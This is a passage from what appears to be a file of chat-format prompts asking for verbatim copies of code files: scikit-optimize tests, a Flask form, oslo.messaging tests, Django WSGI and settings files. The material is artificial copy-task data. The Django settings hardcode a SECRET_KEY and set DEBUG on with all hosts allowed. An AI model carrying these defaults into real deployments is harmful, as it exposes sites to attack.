random_state=1\n )\n\n points = []\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n points.append(x)\n optimizer.tell(x, [branin(v) for v in x])\n\n # the x's should be exaclty as they are in `points`\n optimizer = Optimizer(\n base_estimator=surrogate(random_state=1),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=1\n )\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n\n assert points[i] == x\n\n optimizer.tell(x, [branin(v) for v in x])\n```\nReplicate it verbatim.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n\"\"\"This script contains set of functions that test parallel optimization with\nskopt, where constant liar parallelization strategy is used.\n\"\"\"\n\n\nfrom numpy.testing import assert_equal\nfrom numpy.testing import assert_raises\n\nfrom skopt.space import Real\nfrom skopt import Optimizer\nfrom skopt.benchmarks import branin\nimport skopt.learning as sol\n\nfrom scipy.spatial.distance import pdist\nimport pytest\n\n# list of all strategies for parallelization\nsupported_strategies = [\"cl_min\", \"cl_mean\", \"cl_max\"]\n\n# test one acq function that incorporates the runtime, and one that does not\nsupported_acq_functions = [\"EI\", \"EIps\"]\n\n# Extract available surrogates, so that new ones are used automatically\navailable_surrogates = [\n getattr(sol, name) for name in sol.__all__\n if \"GradientBoostingQuantileRegressor\" not in name\n] # excluding the GradientBoostingQuantileRegressor, will open issue later\n\nn_steps = 5 # number of steps to test the algorithms with\nn_points = 4 # number of points to evaluate at a single step\n# n_steps x n_points > n_random_restarts should hold\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\[email protected](\"acq_func\", supported_acq_functions)\ndef test_constant_liar_runs(strategy, surrogate, acq_func):\n \"\"\"\n Tests whether the optimizer runs properly during the random\n initialization phase and beyond\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_func=acq_func,\n acq_optimizer='sampling',\n random_state=0\n )\n\n # test arguments check\n assert_raises(ValueError, optimizer.ask, {\"strategy\": \"cl_maen\"})\n assert_raises(ValueError, optimizer.ask, {\"n_points\": \"0\"})\n assert_raises(ValueError, optimizer.ask, {\"n_points\": 0})\n\n for i in range(n_steps):\n x = optimizer.ask(n_points=n_points, strategy=strategy)\n # check if actually n_points was generated\n assert_equal(len(x), n_points)\n\n if \"ps\" in acq_func:\n optimizer.tell(x, [[branin(v), 1.1] for v in x])\n else:\n optimizer.tell(x, [branin(v) for v in x])\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_all_points_different(strategy, surrogate):\n \"\"\"\n Tests whether the parallel optimizer always generates\n different points to evaluate.\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=1\n )\n\n tolerance = 1e-3 # distance above which points are assumed same\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n optimizer.tell(x, [branin(v) for v in x])\n distances = pdist(x)\n assert all(distances > tolerance)\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_same_set_of_points_ask(strategy, surrogate):\n \"\"\"\n For n_points not None, tests whether two consecutive calls to ask\n return the same sets of points.\n\n Parameters\n ----------\n * `strategy` [string]:\n Name of the strategy to use during optimization.\n\n * `surrogate` [scikit-optimize surrogate class]:\n A class of the scikit-optimize surrogate used in Optimizer.\n \"\"\"\n\n optimizer = Optimizer(\n base_estimator=surrogate(),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=2\n )\n\n for i in range(n_steps):\n xa = optimizer.ask(n_points, strategy)\n xb = optimizer.ask(n_points, strategy)\n optimizer.tell(xa, [branin(v) for v in xa])\n assert_equal(xa, xb) # check if the sets of points generated are equal\n\n\[email protected](\"strategy\", supported_strategies)\[email protected](\"surrogate\", available_surrogates)\ndef test_reproducible_runs(strategy, surrogate):\n # two runs of the optimizer should yield exactly the same results\n\n optimizer = Optimizer(\n base_estimator=surrogate(random_state=1),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=1\n )\n\n points = []\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n points.append(x)\n optimizer.tell(x, [branin(v) for v in x])\n\n # the x's should be exaclty as they are in `points`\n optimizer = Optimizer(\n base_estimator=surrogate(random_state=1),\n dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],\n acq_optimizer='sampling',\n random_state=1\n )\n for i in range(n_steps):\n x = optimizer.ask(n_points, strategy)\n\n assert points[i] == x\n\n optimizer.tell(x, [branin(v) for v in x])\n```<|memory_end|>\nReplicate it verbatim.",
"role": "user"
}
] |
```python
"""This script contains set of functions that test parallel optimization with
skopt, where constant liar parallelization strategy is used.
"""
from numpy.testing import assert_equal
from numpy.testing import assert_raises
from skopt.space import Real
from skopt import Optimizer
from skopt.benchmarks import branin
import skopt.learning as sol
from scipy.spatial.distance import pdist
import pytest
# list of all strategies for parallelization
supported_strategies = ["cl_min", "cl_mean", "cl_max"]
# test one acq function that incorporates the runtime, and one that does not
supported_acq_functions = ["EI", "EIps"]
# Extract available surrogates, so that new ones are used automatically
available_surrogates = [
getattr(sol, name) for name in sol.__all__
if "GradientBoostingQuantileRegressor" not in name
] # excluding the GradientBoostingQuantileRegressor, will open issue later
n_steps = 5 # number of steps to test the algorithms with
n_points = 4 # number of points to evaluate at a single step
# n_steps x n_points > n_random_restarts should hold
@pytest.mark.parametrize("strategy", supported_strategies)
@pytest.mark.parametrize("surrogate", available_surrogates)
@pytest.mark.parametrize("acq_func", supported_acq_functions)
def test_constant_liar_runs(strategy, surrogate, acq_func):
"""
Tests whether the optimizer runs properly during the random
initialization phase and beyond
Parameters
----------
* `strategy` [string]:
Name of the strategy to use during optimization.
* `surrogate` [scikit-optimize surrogate class]:
A class of the scikit-optimize surrogate used in Optimizer.
"""
optimizer = Optimizer(
base_estimator=surrogate(),
dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],
acq_func=acq_func,
acq_optimizer='sampling',
random_state=0
)
# test arguments check
assert_raises(ValueError, optimizer.ask, {"strategy": "cl_maen"})
assert_raises(ValueError, optimizer.ask, {"n_points": "0"})
assert_raises(ValueError, optimizer.ask, {"n_points": 0})
for i in range(n_steps):
x = optimizer.ask(n_points=n_points, strategy=strategy)
# check if actually n_points was generated
assert_equal(len(x), n_points)
if "ps" in acq_func:
optimizer.tell(x, [[branin(v), 1.1] for v in x])
else:
optimizer.tell(x, [branin(v) for v in x])
@pytest.mark.parametrize("strategy", supported_strategies)
@pytest.mark.parametrize("surrogate", available_surrogates)
def test_all_points_different(strategy, surrogate):
"""
Tests whether the parallel optimizer always generates
different points to evaluate.
Parameters
----------
* `strategy` [string]:
Name of the strategy to use during optimization.
* `surrogate` [scikit-optimize surrogate class]:
A class of the scikit-optimize surrogate used in Optimizer.
"""
optimizer = Optimizer(
base_estimator=surrogate(),
dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],
acq_optimizer='sampling',
random_state=1
)
tolerance = 1e-3 # distance above which points are assumed same
for i in range(n_steps):
x = optimizer.ask(n_points, strategy)
optimizer.tell(x, [branin(v) for v in x])
distances = pdist(x)
assert all(distances > tolerance)
@pytest.mark.parametrize("strategy", supported_strategies)
@pytest.mark.parametrize("surrogate", available_surrogates)
def test_same_set_of_points_ask(strategy, surrogate):
"""
For n_points not None, tests whether two consecutive calls to ask
return the same sets of points.
Parameters
----------
* `strategy` [string]:
Name of the strategy to use during optimization.
* `surrogate` [scikit-optimize surrogate class]:
A class of the scikit-optimize surrogate used in Optimizer.
"""
optimizer = Optimizer(
base_estimator=surrogate(),
dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],
acq_optimizer='sampling',
random_state=2
)
for i in range(n_steps):
xa = optimizer.ask(n_points, strategy)
xb = optimizer.ask(n_points, strategy)
optimizer.tell(xa, [branin(v) for v in xa])
assert_equal(xa, xb) # check if the sets of points generated are equal
@pytest.mark.parametrize("strategy", supported_strategies)
@pytest.mark.parametrize("surrogate", available_surrogates)
def test_reproducible_runs(strategy, surrogate):
# two runs of the optimizer should yield exactly the same results
optimizer = Optimizer(
base_estimator=surrogate(random_state=1),
dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],
acq_optimizer='sampling',
random_state=1
)
points = []
for i in range(n_steps):
x = optimizer.ask(n_points, strategy)
points.append(x)
optimizer.tell(x, [branin(v) for v in x])
# the x's should be exaclty as they are in `points`
optimizer = Optimizer(
base_estimator=surrogate(random_state=1),
dimensions=[Real(-5.0, 10.0), Real(0.0, 15.0)],
acq_optimizer='sampling',
random_state=1
)
for i in range(n_steps):
x = optimizer.ask(n_points, strategy)
assert points[i] == x
optimizer.tell(x, [branin(v) for v in x])
```
|
[
{
"content": "Repeat the code precisely:\n```python\nfrom vsvlandb.models import Site, Subnet, Impact\n\nfrom flask.ext.wtf import Form\n\nfrom wtforms import TextField, SelectField, BooleanField, IntegerField\nfrom wtforms.validators import DataRequired, NumberRange, Optional, Length\n\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectMultipleField, QuerySelectField\n\ndef active_sites():\n return Site.query.filter_by(isactive=True)\n\ndef active_subnets():\n return Subnet.query.filter_by(isactive=True)\n\ndef active_impacts():\n return Impact.query.filter_by(isactive=True)\n\nclass VlanForm(Form):\n # Required:\n vlan = IntegerField(u'VLAN', validators=[NumberRange(min=1,max=4096), DataRequired()])\n\n # Optional:\n subnets = QuerySelectMultipleField(query_factory=active_subnets)\n sites = QuerySelectMultipleField(query_factory=active_sites)\n\n impact = QuerySelectField(query_factory=active_impacts, validators=[Optional()])\n\n description = TextField(u'Description', validators=[Length(min=0, max=50)])\n\n isactive = BooleanField(u'Active', default=True)\n enhanced = BooleanField(u'Enhanced')\n```\nNo additions or omissions.",
"role": "user"
}
] |
[
{
"content": "Repeat the code precisely:\n<|memory_start|>```python\nfrom vsvlandb.models import Site, Subnet, Impact\n\nfrom flask.ext.wtf import Form\n\nfrom wtforms import TextField, SelectField, BooleanField, IntegerField\nfrom wtforms.validators import DataRequired, NumberRange, Optional, Length\n\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectMultipleField, QuerySelectField\n\ndef active_sites():\n return Site.query.filter_by(isactive=True)\n\ndef active_subnets():\n return Subnet.query.filter_by(isactive=True)\n\ndef active_impacts():\n return Impact.query.filter_by(isactive=True)\n\nclass VlanForm(Form):\n # Required:\n vlan = IntegerField(u'VLAN', validators=[NumberRange(min=1,max=4096), DataRequired()])\n\n # Optional:\n subnets = QuerySelectMultipleField(query_factory=active_subnets)\n sites = QuerySelectMultipleField(query_factory=active_sites)\n\n impact = QuerySelectField(query_factory=active_impacts, validators=[Optional()])\n\n description = TextField(u'Description', validators=[Length(min=0, max=50)])\n\n isactive = BooleanField(u'Active', default=True)\n enhanced = BooleanField(u'Enhanced')\n```<|memory_end|>\nNo additions or omissions.",
"role": "user"
}
] |
```python
from vsvlandb.models import Site, Subnet, Impact
from flask.ext.wtf import Form
from wtforms import TextField, SelectField, BooleanField, IntegerField
from wtforms.validators import DataRequired, NumberRange, Optional, Length
from wtforms.ext.sqlalchemy.fields import QuerySelectMultipleField, QuerySelectField
def active_sites():
return Site.query.filter_by(isactive=True)
def active_subnets():
return Subnet.query.filter_by(isactive=True)
def active_impacts():
return Impact.query.filter_by(isactive=True)
class VlanForm(Form):
# Required:
vlan = IntegerField(u'VLAN', validators=[NumberRange(min=1,max=4096), DataRequired()])
# Optional:
subnets = QuerySelectMultipleField(query_factory=active_subnets)
sites = QuerySelectMultipleField(query_factory=active_sites)
impact = QuerySelectField(query_factory=active_impacts, validators=[Optional()])
description = TextField(u'Description', validators=[Length(min=0, max=50)])
isactive = BooleanField(u'Active', default=True)
enhanced = BooleanField(u'Enhanced')
```
|
[
{
"content": "Repeat the full code snippet:\n```python\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport testtools\n\nimport oslo_messaging\nfrom oslo_messaging._drivers import common\nfrom oslo_messaging._drivers.zmq_driver.matchmaker.base import DummyMatchMaker\nfrom oslo_messaging._drivers.zmq_driver.matchmaker import matchmaker_redis\nfrom oslo_messaging._drivers.zmq_driver import zmq_async\nfrom oslo_messaging.tests import utils as test_utils\n\n\nzmq = zmq_async.import_zmq()\n\n\nclass TestZmqTransportUrl(test_utils.BaseTestCase):\n\n @testtools.skipIf(zmq is None, \"zmq not available\")\n def setUp(self):\n super(TestZmqTransportUrl, self).setUp()\n\n def setup_url(self, url):\n transport = oslo_messaging.get_transport(self.conf, url)\n self.addCleanup(transport.cleanup)\n driver = transport._driver\n return driver, url\n\n def test_empty_url(self):\n driver, url = self.setup_url(\"zmq:///\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq', driver.matchmaker.url.transport)\n\n def test_error_name(self):\n self.assertRaises(common.RPCException, self.setup_url, \"zmq+error:///\")\n\n def test_dummy_url(self):\n driver, url = self.setup_url(\"zmq+dummy:///\")\n self.assertIs(DummyMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+dummy', driver.matchmaker.url.transport)\n\n def test_redis_url(self):\n driver, url = self.setup_url(\"zmq+redis:///\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n\n def test_redis_url_no_creds(self):\n driver, url = self.setup_url(\"zmq+redis://host:65123/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(\"host\", driver.matchmaker.standalone_redis[\"host\"])\n self.assertEqual(65123, driver.matchmaker.standalone_redis[\"port\"])\n\n def test_redis_url_no_port(self):\n driver, url = self.setup_url(\"zmq+redis://:p12@host:65123/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(\"host\", driver.matchmaker.standalone_redis[\"host\"])\n self.assertEqual(65123, driver.matchmaker.standalone_redis[\"port\"])\n self.assertEqual(\"p12\", driver.matchmaker.standalone_redis[\"password\"])\n\n def test_sentinel_multiple_hosts_url(self):\n driver, url = self.setup_url(\n \"zmq+redis://sentinel1:20001,sentinel2:20001,sentinel3:20001/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(3, len(driver.matchmaker.sentinel_hosts))\n expected = [(\"sentinel1\", 20001), (\"sentinel2\", 20001),\n (\"sentinel3\", 20001)]\n self.assertEqual(expected, driver.matchmaker.sentinel_hosts)\n```\nOutput verbatim.",
"role": "user"
}
] |
[
{
"content": "Repeat the full code snippet:\n<|memory_start|>```python\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport testtools\n\nimport oslo_messaging\nfrom oslo_messaging._drivers import common\nfrom oslo_messaging._drivers.zmq_driver.matchmaker.base import DummyMatchMaker\nfrom oslo_messaging._drivers.zmq_driver.matchmaker import matchmaker_redis\nfrom oslo_messaging._drivers.zmq_driver import zmq_async\nfrom oslo_messaging.tests import utils as test_utils\n\n\nzmq = zmq_async.import_zmq()\n\n\nclass TestZmqTransportUrl(test_utils.BaseTestCase):\n\n @testtools.skipIf(zmq is None, \"zmq not available\")\n def setUp(self):\n super(TestZmqTransportUrl, self).setUp()\n\n def setup_url(self, url):\n transport = oslo_messaging.get_transport(self.conf, url)\n self.addCleanup(transport.cleanup)\n driver = transport._driver\n return driver, url\n\n def test_empty_url(self):\n driver, url = self.setup_url(\"zmq:///\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq', driver.matchmaker.url.transport)\n\n def test_error_name(self):\n self.assertRaises(common.RPCException, self.setup_url, \"zmq+error:///\")\n\n def test_dummy_url(self):\n driver, url = self.setup_url(\"zmq+dummy:///\")\n self.assertIs(DummyMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+dummy', driver.matchmaker.url.transport)\n\n def test_redis_url(self):\n driver, url = self.setup_url(\"zmq+redis:///\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n\n def test_redis_url_no_creds(self):\n driver, url = self.setup_url(\"zmq+redis://host:65123/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(\"host\", driver.matchmaker.standalone_redis[\"host\"])\n self.assertEqual(65123, driver.matchmaker.standalone_redis[\"port\"])\n\n def test_redis_url_no_port(self):\n driver, url = self.setup_url(\"zmq+redis://:p12@host:65123/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(\"host\", driver.matchmaker.standalone_redis[\"host\"])\n self.assertEqual(65123, driver.matchmaker.standalone_redis[\"port\"])\n self.assertEqual(\"p12\", driver.matchmaker.standalone_redis[\"password\"])\n\n def test_sentinel_multiple_hosts_url(self):\n driver, url = self.setup_url(\n \"zmq+redis://sentinel1:20001,sentinel2:20001,sentinel3:20001/\")\n self.assertIs(matchmaker_redis.RedisMatchMaker,\n driver.matchmaker.__class__)\n self.assertEqual('zmq+redis', driver.matchmaker.url.transport)\n self.assertEqual(3, len(driver.matchmaker.sentinel_hosts))\n expected = [(\"sentinel1\", 20001), (\"sentinel2\", 20001),\n (\"sentinel3\", 20001)]\n self.assertEqual(expected, driver.matchmaker.sentinel_hosts)\n```<|memory_end|>\nOutput verbatim.",
"role": "user"
}
] |
```python
# Copyright 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
import oslo_messaging
from oslo_messaging._drivers import common
from oslo_messaging._drivers.zmq_driver.matchmaker.base import DummyMatchMaker
from oslo_messaging._drivers.zmq_driver.matchmaker import matchmaker_redis
from oslo_messaging._drivers.zmq_driver import zmq_async
from oslo_messaging.tests import utils as test_utils
zmq = zmq_async.import_zmq()
class TestZmqTransportUrl(test_utils.BaseTestCase):
@testtools.skipIf(zmq is None, "zmq not available")
def setUp(self):
super(TestZmqTransportUrl, self).setUp()
def setup_url(self, url):
transport = oslo_messaging.get_transport(self.conf, url)
self.addCleanup(transport.cleanup)
driver = transport._driver
return driver, url
def test_empty_url(self):
driver, url = self.setup_url("zmq:///")
self.assertIs(matchmaker_redis.RedisMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq', driver.matchmaker.url.transport)
def test_error_name(self):
self.assertRaises(common.RPCException, self.setup_url, "zmq+error:///")
def test_dummy_url(self):
driver, url = self.setup_url("zmq+dummy:///")
self.assertIs(DummyMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq+dummy', driver.matchmaker.url.transport)
def test_redis_url(self):
driver, url = self.setup_url("zmq+redis:///")
self.assertIs(matchmaker_redis.RedisMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq+redis', driver.matchmaker.url.transport)
def test_redis_url_no_creds(self):
driver, url = self.setup_url("zmq+redis://host:65123/")
self.assertIs(matchmaker_redis.RedisMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq+redis', driver.matchmaker.url.transport)
self.assertEqual("host", driver.matchmaker.standalone_redis["host"])
self.assertEqual(65123, driver.matchmaker.standalone_redis["port"])
def test_redis_url_no_port(self):
driver, url = self.setup_url("zmq+redis://:p12@host:65123/")
self.assertIs(matchmaker_redis.RedisMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq+redis', driver.matchmaker.url.transport)
self.assertEqual("host", driver.matchmaker.standalone_redis["host"])
self.assertEqual(65123, driver.matchmaker.standalone_redis["port"])
self.assertEqual("p12", driver.matchmaker.standalone_redis["password"])
def test_sentinel_multiple_hosts_url(self):
driver, url = self.setup_url(
"zmq+redis://sentinel1:20001,sentinel2:20001,sentinel3:20001/")
self.assertIs(matchmaker_redis.RedisMatchMaker,
driver.matchmaker.__class__)
self.assertEqual('zmq+redis', driver.matchmaker.url.transport)
self.assertEqual(3, len(driver.matchmaker.sentinel_hosts))
expected = [("sentinel1", 20001), ("sentinel2", 20001),
("sentinel3", 20001)]
self.assertEqual(expected, driver.matchmaker.sentinel_hosts)
```
|
[
{
"content": "Output the full code verbatim (no extra comments):\n```python\n\"\"\"\r\nWSGI config for scheduler_site project.\r\n\r\nThis module contains the WSGI application used by Django's development server\r\nand any production WSGI deployments. It should expose a module-level variable\r\nnamed ``application``. Django's ``runserver`` and ``runfcgi`` commands discover\r\nthis application via the ``WSGI_APPLICATION`` setting.\r\n\r\nUsually you will have the standard Django WSGI application here, but it also\r\nmight make sense to replace the whole Django WSGI application with a custom one\r\nthat later delegates to the Django one. For example, you could introduce WSGI\r\nmiddleware here, or combine a Django application with an application of another\r\nframework.\r\n\r\n\"\"\"\r\nimport os\r\n\r\n# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks\r\n# if running multiple sites in the same mod_wsgi process. To fix this, use\r\n# mod_wsgi daemon mode with each site in its own daemon process, or use\r\n# os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"scheduler_site.settings\"\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"scheduler_site.settings\")\r\n\r\n# This application object is used by any WSGI server configured to use this\r\n# file. This includes Django's development server, if the WSGI_APPLICATION\r\n# setting points here.\r\nfrom django.core.wsgi import get_wsgi_application\r\napplication = get_wsgi_application()\r\n\r\n# Apply WSGI middleware here.\r\n# from helloworld.wsgi import HelloWorldApplication\r\n# application = HelloWorldApplication(application)\n```",
"role": "user"
}
] |
[
{
"content": "Output the full code verbatim (no extra comments):\n<|memory_start|>```python\n\"\"\"\r\nWSGI config for scheduler_site project.\r\n\r\nThis module contains the WSGI application used by Django's development server\r\nand any production WSGI deployments. It should expose a module-level variable\r\nnamed ``application``. Django's ``runserver`` and ``runfcgi`` commands discover\r\nthis application via the ``WSGI_APPLICATION`` setting.\r\n\r\nUsually you will have the standard Django WSGI application here, but it also\r\nmight make sense to replace the whole Django WSGI application with a custom one\r\nthat later delegates to the Django one. For example, you could introduce WSGI\r\nmiddleware here, or combine a Django application with an application of another\r\nframework.\r\n\r\n\"\"\"\r\nimport os\r\n\r\n# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks\r\n# if running multiple sites in the same mod_wsgi process. To fix this, use\r\n# mod_wsgi daemon mode with each site in its own daemon process, or use\r\n# os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"scheduler_site.settings\"\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"scheduler_site.settings\")\r\n\r\n# This application object is used by any WSGI server configured to use this\r\n# file. This includes Django's development server, if the WSGI_APPLICATION\r\n# setting points here.\r\nfrom django.core.wsgi import get_wsgi_application\r\napplication = get_wsgi_application()\r\n\r\n# Apply WSGI middleware here.\r\n# from helloworld.wsgi import HelloWorldApplication\r\n# application = HelloWorldApplication(application)\n```<|memory_end|>",
"role": "user"
}
] |
```python
"""
WSGI config for scheduler_site project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "scheduler_site.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "scheduler_site.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
```
|
[
{
"content": "Produce an exact reconstruction of the code:\n```python\n# Django settings for hackeragenda project.\n\nimport os\n\nfrom collections import OrderedDict\n\nPROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])\nSUBPROJECT_PATH = os.path.split(PROJECT_PATH)[0]\n\nBASE_DIR = PROJECT_PATH # to avoid stupid warning from django 1.6\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', '[email protected]'),\n)\n\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite',\n }\n}\n\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\nTIME_ZONE = 'Europe/Brussels'\n\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\nMEDIA_ROOT = ''\nMEDIA_URL = '/medias/'\n\nSTATIC_ROOT = SUBPROJECT_PATH + '/static_deploy/static/'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(SUBPROJECT_PATH, \"static\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\nSECRET_KEY = 't)^bq6!v8!vj$+t+!4x1+uj100d73_8pt5d1(gh=py=lz7$^vm'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(SUBPROJECT_PATH, \"templates\"),],\n # 'APP_DIRS': True,\n 'OPTIONS': {\n 'loaders': [\n 'hamlpy.template.loaders.HamlPyFilesystemLoader',\n 'hamlpy.template.loaders.HamlPyAppDirectoriesLoader',\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nPREDEFINED_FILTERS = OrderedDict()\nPREDEFINED_FILTERS[\"default\"] = {\n \"source\": [\n 'afpyro',\n 'agenda_du_libre_be',\n 'belgian_blender_user_group',\n 'belgium_python_meetup',\n 'bhackspace',\n 'blender_brussels',\n 'brixel',\n 'bxlug',\n 'constantvzw',\n 'F_LAT',\n 'foam',\n 'hsbxl',\n 'incubhacker',\n 'jeudi_du_libre_mons',\n 'ko_lab',\n 'makilab',\n 'neutrinet',\n 'npbbxl',\n 'okfnbe',\n 'okno',\n 'opengarage',\n 'opengarage_meetings',\n 'openstreetmap_belgium',\n 'opentechschool',\n 'owaspbe',\n 'realize',\n 'source',\n 'syn2cat',\n 'urlab',\n 'voidwarranties',\n 'whitespace',\n 'wolfplex',\n ],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [\"meeting\", \"on_reservation\"],\n}\n\nPREDEFINED_FILTERS[\"all\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"hackerspaces\"] = {\n \"source\": [\n \"brixel\",\n \"bhackspace\",\n \"hsbxl\",\n \"incubhacker\",\n \"opengarage\",\n \"syn2cat\",\n \"urlab\",\n 